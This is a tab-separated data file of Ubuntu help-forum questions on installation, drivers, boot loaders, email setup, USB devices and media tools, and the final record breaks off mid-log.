423180	windows 8 to ubuntu , new acer aspire v3-772g	i 'm trying to install ubuntu on my new acer aspire v3-772g . unfortunantly , when i boot from my bootable usb drive with nomodeset it does n't load the graphical interface , but when i click ctrl+alt+1 i 'll get a commandline . this is n't a big problem , because the installer boots and works ( good ? ) . now , i 'm currently dealing with the following : my current disk-layout is , in the same order ( displayed in the windows diskmanager ) : ssd 1 ( 256gb ) partitions : 400 mb recovery partition 300 mb efi system partition 219.66 gb c : / ( windows ) 18.01 gb recovery partition hdd 1 ( 1tb ) partitions : 931.51gb d : / ( windows ) i would like to move my recovery partitions to the 1tb hdd and fully wipe my ssd.. this because i would like to be able to recover my notebook back to windows , in case something is wrong in the hardware or so . also , what 's the efi partition doing there ? are i 'm able to remove it for ubuntu ? and will i 'm be able to recover windows without this partition ? note : i 've also tried to create a new partition of ~20gb on the hdd ( and shrink the d partition ) and use the create recovery station utility in windows , but this does n't recognize the extra partition in any way.. ( with/without disk number ( like c/d in windows ) i hope you can give me some answers . i really would like to install ubuntu on my new notebook.. thanks more details : fast boot off secure boot off uefi on
423187	how to add windows 7 entry in grub	yesterday , i installed windows 7 first on /dev/sdc1 and after doing all the configuration when i installed ubuntu 13 on /dev/sdb and after completion of ubuntu installation i reboot the system there i saw that windows 7 is not included in grub . i tried running grub-update but it didnt work . is there are a way to also include windows 7 entry in grub .
423192	10.04 still receiving updates	i was under the impression that i was running 10.04 desktop on my laptop , but i am still receiving updates , latest 30 mins ago . is there a method to determine which distribution was initially installed , server or desktop ? i have read this post , is 10.04 lts still supported by the ubuntu desktop advanced ?
423194	installed program wo n't show up in the dash	i have successfully installed doxygen with doxywizard via the ubuntu software center as i can see in a terminal : user @ user-d3220-b1 : ~ $ whereis doxywizard doxywizard : /usr/bin/doxywizard /usr/bin/x11/doxywizard /usr/share/man/man1/doxywizard.1.gz starting doxywizard from the terminal works fine , but if i type it in the dash nothing is found . instead it says : sorry , there is nothing that matches your search . why is that ?
423195	how to manually set up individual nvidia driver modul to boot , instead of the systems choosen one ( nvidia geforce 7200gs )	i 'm trying to get ubuntu 13.10 working on a desktop with a nvidia 7200gs . first i 've tried to install the official drivers from the nvidia website , which did n't work - the installer aborted on creating the kernel modules . googling around i 've found the x-edgers ppa to install the drivers from . according to the docs i 've installed the matching drivers for my card : sudo apt-get install nvidia-304 nvidia-304-settings after rebooting the x server does n't start , but there are no fatal error messages in the x log . listing the loaded modules does n't include any nvidia module . but : if i manually load nvidia-304 module instead of nvidia everything works fine - i can start lightdm and even login : lsmod | grep nvidia modprobe nvidia-304 lsmod | grep nvidia nvidia xxxxxxxxxx 0 service lightdm start what to do here to have the appropriate module started on boot ?
423200	what is the fastest way to move files ?	i have a large folder around 6.6gb , it contains about 450000 files . i copy it from one partition to another . it writes that 6 hours left though it has been running for 3 hours now . average transfer speed is 200kb/s . is there a better way for file transferring ?
423201	how to use smscaster in ubuntu	i try to use smscaster in ubuntu for my business but it will have an error that states you have not setup the com port for connecting to the phone . this is a very important step in using smscaster e-marketer . anyone ca help me how to solve my problem or do you have any suggestions so that i can send bulk sms in ubuntu with broadband ?
423203	can /proc/partitions and the command file -s device_name be used to get info on an unmounted usb drive	i am tring to get information on an unmounted usb drive using /proc/partitions and file -s device_name where the usb drive has a device name typical to any usb device , i.e . andy 's usb or dave 's usb . the device is plugged in and showing on the desktop and also under devices . i have not mounted it using the terminal in anyway whatsoever , i.e . sudo mkdir /media/usb sudo mount /dev/sdb1 /media/usb so , if using the commands mentioned above , what information can be obtained about this usb device ?
423207	if i have windows on hibernate , and i start ubuntu , will my computer lag ?	i have my computer set to dual boot , and it runs ubuntu and win 7 . i normally do n't shut my computer down , because i use it frequently , so i normally put it on hibernate . when i press the power button , the grub loader shows up , and then i can choose windows , and resume windows , or i can start loading ubuntu . if i have windows on hibernate , will it be using up some of my ram memory , and cause it to lag ? or will i not have a problem at all ?
423208	how to open a directory and view images if it contains a large number of image files ( ~70,000 ) ?	i am working on a image processing project . for that i have a directory which contains around 70,000 images . as i process them in multiple stages i save the intermediate images in another directory . but when i want to see it i ca n't do it , as when i open the directory , due to the number of files the file manager stops responding . even if i somehow manage to open it , i fear that the image viewer will not respond , as i am under the impression that they try to put a few images in cache to load faster . i tried to open the images from terminal . i can open one image at a time in this case but i ca n't view it as a gallery , which is equally bad as i need to view many images to know that the results are satisfactory .
423210	sendmail host name lookup failure , can not send email	i can not send emails with php mail ( ) function or even with mail console function i am getting error . from /var/log/email.log feb 19 17:29:07 peter-comp sm-mta [ 8087 ] : s1jbmw5m011556 : to= < mymailatgmail @ gmail.com > , ctladdr= < www-data @ peter-comp > ( 33/33 ) , delay=03:40:09 , xdelay=00:00:00 , mailer=esmtp , pri=2370419 , relay=gmail.com. , dsn=4.0.0 , stat=deferred : name server : gmail.com . : host name lookup failure /etc/hosts 127.0.0.1 localhost.localdomain localhost 127.0.1.1 peter-comp.example.com peter-comp /etc/resolv.conf nameserver 127.0.1.1 i tried this shell script to send email : # ! /bin/sh recipient=petrneok @ gmail.com sender=jd @ example.net /usr/sbin/sendmail -am -i -v -f $ sender -- $ recipient < < end to : $ recipient from : $ sender subject : test ! test ! end getting this error : deferred : name server : gmail.com . : host name lookup failure how can i fix this ? update after run this script with sh tt.sh -d8.20 petrneok @ gmail.com ... connecting to gmail-smtp-in.l.google.com . via esmtp ... 220 mx.google.com esmtp ua15si3980233wib.15 - gsmtp > > > ehlo peter-comp.example.com 250-mx.google.com at your service , [ myipaddress ] 250-size 35882577 250-8bitmime 250-starttls 250-enhancedstatuscodes 250 chunking > > > starttls 220 2.0.0 ready to start tls > > > ehlo peter-comp.example.com 250-mx.google.com at your service , [ myipaddress ] 250-size 35882577 250-8bitmime 250-enhancedstatuscodes 250 chunking > > > mail from : < jd @ example.net > size=66 250 2.1.0 ok ua15si3980233wib.15 - gsmtp > > > rcpt to : < petrneok @ gmail.com > 250 2.1.5 ok ua15si3980233wib.15 - gsmtp > > > data 354 go ahead ua15si3980233wib.15 - gsmtp > > > . 550-5.7.1 [ myipaddress ] the ip you 're using to send mail is not authorized to 550-5.7.1 send email directly to our servers . please use the smtp relay at your 550-5.7.1 service provider instead . learn more at 550 5.7.1 http : //support.google.com/mail/bin/answer.py ? answer=10336 ua15si3980233wib.15 - gsmtp
423211	how to change the mirror of setuptools ?	i changed the ~/.pip/pip.conf file to a customized mirror , and pip install do download the package from that mirror . but when installing ( run the setup.py ) , i find setuptools still get packages from http : //pypi.python.org/simple/ . so how to change the mirror setuptools using ? the system is ubuntu 12.10 and setuptools version 0.6
423212	does ubuntu touch have a terminal and/or a compiler ?	does ubuntu tablet have any sort of compiler where python/c/c++ can be written and run ? also , does it have a terminal ?
423215	preseeding/kickstart ubuntu install	i am trying to achieve the following : i have created a kickstart script as adviced here : automatic installation - help.ubuntu.com and want to run it from the live session , without passing a boot parameter to it at startup . so this should look like this : i copy the kickstart file from an usb to a certain location and point the ubuntu installer to it somehow , which is the reason for this question . idea behind all this : i want to boot the live cd , mount an usb , that executes a shell script : the script sets up new encrypted partitions , starts the installer with my configuration file and after the install is complete , plays back my backup from the usb and does some configuration stuff for me . so this script should setup the whole system for me . i would be very interested to find the missing gap in order to make this possible . edit : another way would be preseeding , as outlined here : https : //help.ubuntu.com/10.04/installation-guide/i386/preseed-using.html
423217	wrong scrollbars - sudo and ssh	i prefer the overlay scrollbars to the default gnome scrollbars . these work fine except in two cases : using sudo , like sudo synaptic . using ssh to open an x application on a remote server . or in other words , anything not rendering a window under the user id logged into the desktop . in these cases i get the default gnome scrollbars on ubuntu 13.10 . this was n't the case with older versions of ubuntu . in those cases i always got the overlay scrollbars . any ideas how to fix this ?
423220	ascii art generator with ocr	what program can turn an image into ascii-art , but also replace any text with the actual text with ocr . for example , for converting a comic to ascii art .
423225	how do i convert pal dvd to ntsc	i just bought some sci-fi movies online , and the disk format it pal section 2 . i can play them in vlc just fine , but i want to convert them to ntsc so i can use my dvd player /tv . how can i convert these pal dvds to ntsc images ? the files are separated into numerous vob files . i was going to try to use ffmpeg , but i do not know how to convert files that are all broken up like this .
423226	why does my computer say `` failed to load session '' in ( ubuntu 12.04 ) ?	i tried a lot of commands , but nothing works , i ca n't get my desktop back .
423228	bulk sms sending	is there any suggestions on how we can send bulk sms in ubuntu ? i need it for my business . if anyone knows how we can send bulk sms in the ubuntu software just tell me , thank you .
423230	how to compile ffmpeg with x265 support ?	today i found out that x265 is already present in ffmpeg so i compiled ffmpeg with this guide sadly libx265 did not work on ubuntu , however on windows i tried the same thing with zeranoe ffmpeg build and it worked without a problem . so do you think i did something wrong or it is not yet implemented in linux build ( using that guide ) ? the results of the command ffmpeg -codecs | grep -i hevc show : ffmpeg version 2.1.git copyright ( c ) 2000-2014 the ffmpeg developers built on feb 19 2014 19:00:17 with gcc 4.8 ( ubuntu/linaro 4.8.1-10ubuntu9 ) configuration : -- prefix=/home/levan/ffmpeg_build -- extra-cflags=-i/home/levan/ffmpeg_build/include -- extra-ldflags=-l/home/levan/ffmpeg_build/lib -- bindir=/home/levan/bin -- extra-libs=-ldl -- enable-gpl -- enable-libass -- enable-libfdk-aac -- enable-libmp3lame -- enable-libopus -- enable-libtheora -- enable-libvorbis -- enable-libvpx -- enable-libx264 -- enable-nonfree -- enable-x11grab libavutil 52 . 64.100 / 52 . 64.100 libavcodec 55 . 52.102 / 55 . 52.102 libavformat 55 . 33.100 / 55 . 33.100 libavdevice 55 . 10.100 / 55 . 10.100 libavfilter 4 . 1.102 / 4 . 1.102 libswscale 2 . 5.101 / 2 . 5.101 libswresample 0 . 17.104 / 0 . 17.104 libpostproc 52 . 3.100 / 52 . 3.100 d.v.l . hevc h.265 / hevc ( high efficiency video coding ) thank you for your time
423231	libre office 4.2.1.1 image problem	after a normal ubuntu 12.04 upgrade libre office 4.2.1.1 shifted my letterhead graphic that i have on hundreds of letters . the graphic is not visible on my letters but does appear when i right click and view the picture . the problem seems to be that my image is not cropped and has a lot of `` white space '' around it . my theory is that the upgrade somehow shifted the area shown to just white space . how can i get libre office to function the previous way and show my letterhead image on previously written letters ?
423236	new files window opens up every few seconds when android is attached via usb cable	every time i attach my android 4.4.2 phone ( nexus 4 ) to ubuntu 13.10 via the usb cable i get a new files ( 3.8.2 ) window opening up every few seconds . how can i have it open up just one files window ? ( files is the default ubuntu gnome file system explorer interface ) any suggestions on how to t/s ? here are contents of /var/log/syslog : kernel : [ 12304.635287 ] usb 3-2 : new high-speed usb device number 3 using xhci_hcd kernel : [ 12304.652484 ] usb 3-2 : new usb device found , idvendor=18d1 , idproduct=4ee2 kernel : [ 12304.652492 ] usb 3-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 kernel : [ 12304.652495 ] usb 3-2 : product : nexus 4 kernel : [ 12304.652498 ] usb 3-2 : manufacturer : lge kernel : [ 12304.652501 ] usb 3-2 : serialnumber : 0043182cca4ea97c colord : device added : sysfs-lge-nexus_4 dbus [ 654 ] : [ system ] activating service name='org.freedesktop.hostname1 ' ( using servicehelper ) dbus [ 654 ] : [ system ] successfully activated service 'org.freedesktop.hostname1' colord : device removed : sysfs-lge-nexus_4 kernel : [ 12330.077949 ] usb 3-2 : usb disconnect , device number 3 kernel : [ 12330.349156 ] usb 3-2 : new high-speed usb device number 4 using xhci_hcd kernel : [ 12330.366284 ] usb 3-2 : new usb device found , idvendor=18d1 , idproduct=4ee2 kernel : [ 12330.366292 ] usb 3-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 kernel : [ 12330.366296 ] usb 3-2 : product : nexus 4 kernel : [ 12330.366299 ] usb 3-2 : manufacturer : lge kernel : [ 12330.366302 ] usb 3-2 : serialnumber : 0043182cca4ea97c colord : device added : sysfs-lge-nexus_4 colord : device removed : sysfs-lge-nexus_4 kernel : [ 12344.390268 ] usb 3-2 : usb disconnect , device number 4 kernel : [ 12344.661313 ] usb 3-2 : new high-speed usb device number 5 using xhci_hcd kernel : [ 12344.678278 ] usb 3-2 : new usb device found , idvendor=18d1 , idproduct=4ee2 kernel : [ 12344.678286 ] usb 3-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 kernel : [ 12344.678289 ] usb 3-2 : product : nexus 4 kernel : [ 12344.678292 ] usb 3-2 : manufacturer : lge kernel : [ 12344.678295 ] usb 3-2 : serialnumber : 0043182cca4ea97c colord : device added : sysfs-lge-nexus_4 colord : device removed : sysfs-lge-nexus_4 kernel : [ 12380.797292 ] usb 3-2 : usb disconnect , device number 5 kernel : [ 12381.068293 ] usb 3-2 : new high-speed usb device number 6 using xhci_hcd kernel : [ 12381.085422 ] usb 3-2 : new usb device found , idvendor=18d1 , idproduct=4ee2 kernel : [ 12381.085430 ] usb 3-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 kernel : [ 12381.085434 ] usb 3-2 : product : nexus 4 kernel : [ 12381.085437 ] usb 3-2 : manufacturer : lge kernel : [ 12381.085440 ] usb 3-2 : serialnumber : 0043182cca4ea97c colord : device added : sysfs-lge-nexus_4
423240	ca n't use sudo after changing the user password	i am currently running ubuntu 12.04 and i recently changed my account password . before the password change , i was able to run commands via sudo when necessary while using my old password with no problem . however , after changing my password , the new password is no longer accepted when trying to use sudo . i can log into the computer with the password correctly , but the password is not accepted for sudo . i have tried using the old password as well , with no success . this probably sounds like a case of incorrect password input , however , i just spent 5 minutes trying to change my own password using passwd , and it would not accept the current password . i could go into recovery mode and change my password with the root account , but i 'm not sure if that will fix my problem or not , and i 'd rather not have to do that .
423243	installiation and upgrade	how to install ubuntu in samsung galaxy grand ? please help me in this ? im a great fan of ubuntu and im using this in my laptop and also in desktop . so i like to use in my mobile also .
423249	sudo update-initramfs returns 'invalid argument for option -k. ' regardless of arguments	i 'm trying to get ubuntu running under hyper-v to have more resolutions . as part of that ( instructions are from a different post on here ) i need to run update-initramfs uname -a linux xyz-ubuntu-12-vm 3.11.0-15-generic all of these : sudo update-initramfs –k 3.11.0-15-generic -u sudo update-initramfs –k all -u sudo update-initramfs –k 'all ' -u sudo update-initramfs -u all return : invalid argument for option -k. how do i get update-initramfs to run ? the man page is pretty clear that `` all '' is a valid option . single or double quotes changed nothing . the initrd file for this version of the kernel ( uhh , is that terminology right ? ) is already there , so i do n't need to create it : $ ll /boot | grep initrd -rw-r -- r -- 1 root root 17454626 feb 18 17:45 initrd.img-3.11.0-15-generic
423250	can i update/upgrade my ubuntu version ?	i am currently running ubuntu 12.04 and would like to upgrade/update it to 13.10 without losing my files . i have the ubuntu one cloud but i have limited space . is there any way to get a different version of ubuntu without having to lose my files or upload them to a cloud ?
423251	how to setup digitalcoin p2pool on ubuntu 12.04.4 lts 64-bit	how to setup digitalcoin p2pool on ubuntu 12.04.4 lts 64-bit i already know how to solo mine . i have been solo mining on windows for a month now . i want to setup and mine on a digitalcoin p2pool on ubuntu 12.04.4 lts 64-bit so other people on my lan can mine also . please help .
423252	apt error `` could not get lock ... ''	i know that the sudo password is my account password . buy when i type it that error messafe comes `` could not get lock ... .. '' . what to do ?
423260	turn num lock permanently on	is there a way to turn num lock on permanently , across all remote desktop sessions ( 99 % windows os ) and my local install of ubuntu 14.04 ? i have never met anyone in the past 25 years of computing who actually uses a 10-key keypad with num lock off . all day i 'm hitting the num lock key to turn it on for a particular remmina ( rdp ) session . i connect to the same servers most of the day , and my remmina settings ( settings that never actually save ! ) are to `` remember last view mode for each connection '' but i do n't think that setting has anything to do with keyboard stuff , just video and interface settings -- who 's settings do n't save either ! maddening ! ! ! ! ! thanks !
423264	when do you release ubuntuedge ?	ubuntu edge is very good , but when do you release it ?
423266	findd command in ubuntu	in this link , i saw a guy using findd command . but , it seems ubuntu does n't have this command by default . are there any similar alternatives or how i could get it installed ( recommend the best way ) ? update : in that video it 's mentioned on 01:49 sec . it seems , what this command does is list all files including all files in sub-folders in one list .
423268	screensaver not activating in 13.10	i 'm running ubuntu 13.10 64bit and the unity desktop environment . i have my screen lock settings configured so it will blank the screen after 5 min . and lock it imediatly . the problem is it does n't ! nothing happens and the screen remains on . i checked gnome-screensaver is running and it is ! and it works if i press ctrl-l . but it does n't work on timeout ... any ideas on how i can fix this ? or at least debug the issue so i can find a cause ? thanks in advance .
423274	grub in 13.10 does n't notice a btrfs root ?	i 'm using ubuntu 13.10 ( saucy ) as my primary system and installed a daily version of trusty in a btrfs partition . for some reason my grub from 13.10 ca n't find that partition , even though it finds a 12.04 and an old windows partition just fine . google does n't return anything helpful , since there 's no error message to search for . does anyone know if there 's an incompatible change to btrfs or something , or is this simply a bug ?
423275	vague error when trying to install 13.10 from a bootable usb drive	i got this error message : [ 1.246584 ] kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) when trying to install 13.10 from a bootable flash drive onto a new machine i built myself . i 'm trying ubuntu because i got tired of retarded problems when trying to install windows 8 , but it is very frustrating to get such an error immediately when trying to install ubuntu .
423278	ethernet connection problem in ubuntu 13.04	my ethernet connection ca n't load any page . i ca n't update , i ca n't install software from ubuntu software center . only transmission is working . mobile broadband connection works well too . whats wrong with my wired connection ? ifconfig while connected to ethernet http : //imgur.com/jjesqai
423279	why is it not advised to change sources.list to point to a newer version when upgrading ?	i just wanted to know why precisely it is not advised to just change the sources.list file to point to a newer version i want to upgrade to ? i used that method some time with success . what problems will i get when using this method against using for example the software updater upgrade ubuntu ?
423281	screen graphics disturbed after wake up from suspend	after i wake up my ubuntu from suspend , sometimes i see the screen graphics completely blurred like depicted below . what may be the reason for this & how to rectify this . running ubuntu 12.04.4 lts on a dual boot win7+ubuntu pc .
423285	which graphic driver to install for hp dv7 on ubuntu 13.10 ?	i have an hp dv7 with ati graphic card with an intel on ubuntu 13.10 with default kernel ( i will install ubuntu 's linux 3.13 probably ) and xorg ( 1.14 i think ) . which graphic card should i enable ? i really do n't know what to do . here my ati from lspci : 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] madison [ mobility radeon hd 5650/5750 / 6530m/6550m ]
423289	samsung np900x3g issues on ubuntu 12.04 ( keyboard backlight , multitouch ... )	i recently got the newest member of the samsung ativ book 9 family np900x3g and i 'm having the same issues that have been reported for the previous models but none of the fixes worked for me . especially annoying is the keyboard backlight as it drains my battery . i tried the following instructions but it did n't change anything . https : //help.ubuntu.com/community/samsungseries9 and this is apperantley only for 13.10 keyboard backlight function keys for samsung series 9 np900x3d and ubuntu 13.10 as there is no hwdb.d in 12.04 i also would like to activate pinch zoom on my multitouch pad but could n't get it to work . any suggestions ? thanks for your help !
423292	installing ubuntu on external hard drive ( boots to black screen )	hey everyone this is my first post here on the askubuntu forums . i 've been an avid linux user for over a year now but by no means an expert . the problem i 'm facing is one i have not been able to solve by myself . i have installed ubuntu 13.10 on an external hard drive of mine . i do n't know if this matters , but this external hard drive of mine is actually an old hard drive from my old gateway laptop . once the monitor on the gateway laptop had burned out i simply extracted the hard drive ( and checked it to make it is healthy which it is ) and placed it in an external hard drive enclosure . i 've created an ubuntu liveusb using the pendrivelinux universal usb installer . i know the installer works because i have installed it on other systems . i 've run the ubuntu liveusb and it looks like i have installed ubuntu 13.10 on the external hard drive as it has the /root directory , the swap directory , and the bootloader installed on the external drive ( /dev/sdc ) . when i go to boot from the external drive , all i boot into is a black screen that does nothing causing me to hard reset my laptop . no grub menu nothing . i know that my laptop is capable of booting from usb because i can boot from the liveusb . i 've also tried using boot-repair in both the liveusb and as its own bootable usb to repair grub . here are the results http : //pastebin.ubuntu.com/6960951/ please help ! all i want is run ubuntu from the external drive , i never thought it would be so difficult . thanks a lot edit : my laptop is running windows 8 pro , that was installed by upgrading from windows 7 on a bios set-up . i do not have secure boot nor uefi . the computer is a hp dv6 model . the os that was previously on the external hard drive ( where i am attempting to run ubuntu from ) was windows 7 i believe but i 've formatted the drive .
423293	why does n't kdialog send notification properly ?	here is the command : kdialog -- passivepopup 'this is a notification ' 55 this command sends a notification at the up-right corner of the screen , with a blue background and white text . i am expecting something like this :
423299	how to see if a ppa supports my distro	i often use the terminal to add a ppa to my resources list , only to find out afterwards that the ppa does n't support my ubuntu version , allas , thus am greeted with a error : 404 not found how can i check via terminal , if , the to be added ppa , supports my ubuntu version ?
423300	live usb on a 2-partition usb-drive	i was wondering if i could have 2 partitions on a usb-drive that would allow me to boot on my key as a regular usb-installation-disk ( partition1 ) , and another partition for regular storage under windows/ubuntu ( partition2 ) . i would like to have a disk with : /dev/sdb ( 16gb ) - sdb1 : ext4/fat32 , liveusb ( 2gb ) - sdb2 : fat32 , storage ( 14gb ) could that key be booted and used as a regular usb drive ? ps : that is because i 'm sick of installing/uninstalling ubuntu on my usb drive everytime i need to rescue a pc , and i 'm not willing to buy a usb-drive only for ubuntu-installation-disk .
423302	how to encrypt my `inbox` thunderbird file .	i recently found out that thunderbird also downloads my folders created in hotmail . no biggie . but , those are stored in plain-text , and so it does with the inbox thunderbird file . how can i make thunderbird encrypt my inbox and other mail related stuff it downloads as they contain sensitive information ... .
423303	server version where do i go to from command line interface prompt ( dos-type screen )	help i am new to linux/ubuntu . i installed the server edition on a micro server instead of windows home server as used on my other one . after 3 attempts it finally installed . however all i get at boot up time is a dos type screen . i log in as requested and after a few lines of obscure text it just sits with an equally obscure and user unfriendly prompt . no help , no other prompt . i installed the grub boot loader but nothing else loads except this unfriendly dos style prompt . before i wipe the whole thing off the disk and look elsewhere could someone give a quickie idea of where i go from here . all i need is a fairly straightforward file server that can be set up with users/shares etc .
423308	startup problem with ubuntu 12.04 lts	so i installed ubuntu 12.04 lts on my laptop and the only way to get ubuntu to boot is if i go to boot manager and start it from a uefi partition called uefi , if i do n't do that i just get a screen telling me my mac address and then telling me to insert a bootable device . i ca n't see that partition in the bios so i do n't know what to do , any help would be great . p.s . i am not dual-booting this with windows . fdisk -l results : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 1465149167 732574583+ ee gpt partition 1 does not start on physical sector boundary . parted -l results : model : ata hitachi hts54757 ( scsi ) disk /dev/sda : 750gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 512mb 511mb fat32 2 512mb 744gb 744gb ext4 boot 3 744gb 750gb 5877mb linux-swap ( v1 ) warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label
423309	is there any wedding album designing software for ubuntu like karizma albums in windows ?	i use karizma albums ( http : //www.karizmaalbums.com/ ) in windows for filpbook type wedding album designing . is there any equivalent programs for ubuntu ? i would prefer open source and free softwares first . any suggestion would be of great help . thanks in advance . i found scribus ( http : //www.scribus.net ) is somewhat useful for doing this type of work , but i am not accustomed to scribus , and testing it for album designing . still if you have any suggestion or tutorial link to scribus specific to this type of album designing , please mention .
423314	how to change teamviewer id after cloning	today i was cloning a couple of images of ubuntu to further expand the use of ubuntu over the company but just noticed that all cloned pcs have the same teamviewer id . i followed teamviewer forum suggestion about purging teamviewer , removing the .config/teamviewer9 folder and even the /opt/teamviewer one with no luck . the id stays the same even after rebooting or waiting for about 30 mins before installing teamviewer again . how can i reset/change the teamviewer id in ubuntu for all the cloned computers . right now i am using the latest version of teamviewer ( version 9 ) .
423316	can not access my hdd properties with a `` disk full '' warning and no documents folder	after downloading suggested packages from the ubuntu update manager , running deborphan to remove orphaned libraries and config files while trying to make the trash bin icon appear so i could access it ( to delete files inside of it ) i turned my laptop off ( it has both , windows and ubuntu ) . after turning it on again , the system says `` disk full '' and i can not find my documents folder . i tried turning the laptop off but now it asks for a password and when i input the correct ones the system says they are the wrong passwords . how can i access the system and recover the information from it ( specially the documents folder ) since i know the disk is neither full , nor is the password wrong .
423317	repair windows 8 bcd/mbr	i was working on a dual boot and my windows bcd is gone . i need it to run windows ( clearly ) i acquired a live cd for ubuntu but i do n't know the terminal command to restore boot data . so any and all help is appeiciated .
423319	function keys + volume button issue	i have a samsung np355v5c laptop which has an amd processor and a radeon gfx . my problem is pretty straight forward , fn + vol . up/vol . down - the volume notification goes crazy to max/min . fn + brightness , fn + mute , fn + touchpadlock - works fine . keyboard entries and mouse clicks are blocked entirely after fn + vol . action . the only thing i could do is to reboot . would really appreciate any help on this issue and if anything can be done about it . already facing issues like : battery lasting less than an hour ( over ) heating issues and this fn-key has always been a problem for which i couldnt find any fruitful solution . guys i apologize for asking this question yet again since it has been asked numerous times in numerous forums .
423324	system load indicator show different ram usage	i have installed system load indicator on my pc . first , it shows different ram usage than internal ubuntu system monitor . i mean while syetem monitor is showing 750mb of ram usage , system load indicator is hsowin 850mb . in addition , i see there is cache memory and user memory in system load indicator . should i consider cache memory as free memory ? while , user memory + cached memory is more than my physical memory , my pc crashes . unfortunately , it 's full just by opening a firefox browser .
423326	radeon hd 8870m	good day to all i am busy trying to set-up a dell inspiron 17 laptop for a friend , with ubuntu 30.10 64 bit . this issue that i am having is the amd radeon hd 8870m card . i have tried all the drivers listed by ubuntu by default , and the ones compiled by amd but it keeps braking the installation . the screen by default is low res and over saturated with green so everything is shades of green .
423330	ubuntu 13.10 gnome - nvidia 675mx and intel drivers	i 've currently made a new switch over from 12.04 to 13.10 due to my love for the gnome 3 desktop and 12.04 were breaking gnome 3 each time . however 13.10 detects my intel ivy bridge and will use it instead of my nvidia , which is fair enough , however i have installed nvidia-331 drivers with optimus and installed bumblebee ui in order to apply nvidia to certain applications . however back in my 12.04 i was able to play games like left 4 dead 2 with maxed out settings with a smooth and stable fps , however now , left 4 dead 2 will jump with fps spikes every second . therefore pointing to the fact the nvidia drivers might not be even activating ! i 'm willing to start my driver installation from scratch and i 've seen a lot of tutorials already out there , but am cautious of testing them out due to personal experience of graphics drivers being the end of my ubuntu installation ! question being has anybody got something close to this working ? with smooth fps in most gaming applications ? if so please tell me how you did it ! cheers raptus
423333	openvpn plugin not showing in network-manager on ubuntu gnome 13.10 saucy	i have installed openvpn + network-manager-openvpn & network-manager-openvpn-gnome for the network-manager in ubuntu gnome 13.10 . running netstat -rn i get tun outputs : - 10.8.0.1 10.8.0.5 255.255.255.255 ugh 0 0 0 tun0 10.8.0.5 0.0.0.0 255.255.255.255 uh 0 0 0 tun0 so all that looks good to me . however i can not see any sign of openvpn in the network-manager applet . i ca n't find any answers to this , so can anyone help please ?
423334	ubuntu 13.10 and realtek 8723ae-bt wifi problems	the wifi keeps flickering on and off . sometimes it weakens in signal and sometimes it completely disappears . my kernel is 3.12.0 generic . i 've tried almost every possible solution available on this website and on the internet in general . has anyone with this problem solved it successfully yet ?
423336	i want to know if increased ram will help after conversion of xp -- > xubuntu 13.10	i 'm using xp now in an old dell pc . here are the stats : os version : microsoft windows xp professional , service pack 3 , 32 bit processor : intel ( r ) pentium ( r ) 4 cpu 2.80ghz , x86 family 15 model 4 stepping 1 processor count : 1 ram : 1149 mb graphics card : intel ( r ) 82865g graphics controller , 96 mb hard drives : c : total - 38091 mb , free - 18046 mb ; motherboard : dell computer corp. , 0u2575 i want to convert to xubuntu 13.10 but now i get a lot of 'low virtual memory ' warnings and i 'd like to increase the memory from 2gb to 4gb . i want to do this before the conversion because this website ( crucial.com ) assess your computer and gives compatible memory stick recommendations ( crucial.com does not do this for linux ) . a computer knowledgeable person i know said it was not worth increasing the memory , but the way i see it , it ca n't hurt . anybody got any feedback on this for me ? think i should increase the memory from 2gb -- > 4gb or not ? thanks ! sorry , all , got that ram situation wrong ( the specs are right ) . am only thinking about upgrading to 2gb of ram . ( thx for quick , excellent responses . )
423337	chromium youtube codecs	i just tried to fix a problem i had as discribed here : this video is currently unavailable - youtube ( since i have less then 15 reputation , i can not simply add comments in that thread : ( ) installing the `` extra '' -codecs helped so that the videos ( for example http : //www.youtube.com/watch ? v=suepgqlaxxs ) i had problems with are running but i do n't have got any sounds..
423339	automatically enter a pw for a bit bucket account ?	i have a git repo on an ubuntu 12.04 machine synced with a remote bit bucket repo . when i do a git pull i have to always provide a password . is there a way to store that pw so that i do n't have to enter it each time i do a pull ?
423340	ubuntu 12.04 does n't mount external drives through usb on lenovo ideapad z710	i have an external dvd-drive , an usb mouse and an usb hub with three external drives attached to three different usb ports on my lenovo laptop . after booting and login usually only one or two of those three usb devices is ready to use . for instance : i can use the mouse and the dvd drive , but the system does n't really recognize the three external drives connected through the hub . i tried dis- and reconnecting the hub , and i can see in /var/log/syslog , it does recognize the three drives , but not the filesystems . this is also the case if i attach a usb stick . it typically looks like this for each drive : feb 19 21:05:43 lenovo kernel : [ 1194.951274 ] usb 3-1 : new high-speed usb device number 55 using xhci_hcd feb 19 21:05:43 lenovo kernel : [ 1194.967990 ] usb 3-1 : new usb device found , idvendor=0781 , idproduct=5530 feb 19 21:05:43 lenovo kernel : [ 1194.967999 ] usb 3-1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 feb 19 21:05:43 lenovo kernel : [ 1194.968005 ] usb 3-1 : product : cruzer feb 19 21:05:43 lenovo kernel : [ 1194.968009 ] usb 3-1 : manufacturer : sandisk feb 19 21:05:43 lenovo kernel : [ 1194.968013 ] usb 3-1 : serialnumber : 2*************************c feb 19 21:05:43 lenovo kernel : [ 1194.968811 ] usb-storage 3-1:1.0 : usb mass storage device detected feb 19 21:05:43 lenovo kernel : [ 1194.968958 ] scsi11 : usb-storage 3-1:1.0 feb 19 21:05:44 lenovo mtp-probe : checking bus 3 , device 55 : `` /sys/devices/pci0000:00/0000:00:14.0/usb3/3-1 '' feb 19 21:05:44 lenovo mtp-probe : bus : 3 , device : 55 was not an mtp device feb 19 21:05:44 lenovo kernel : [ 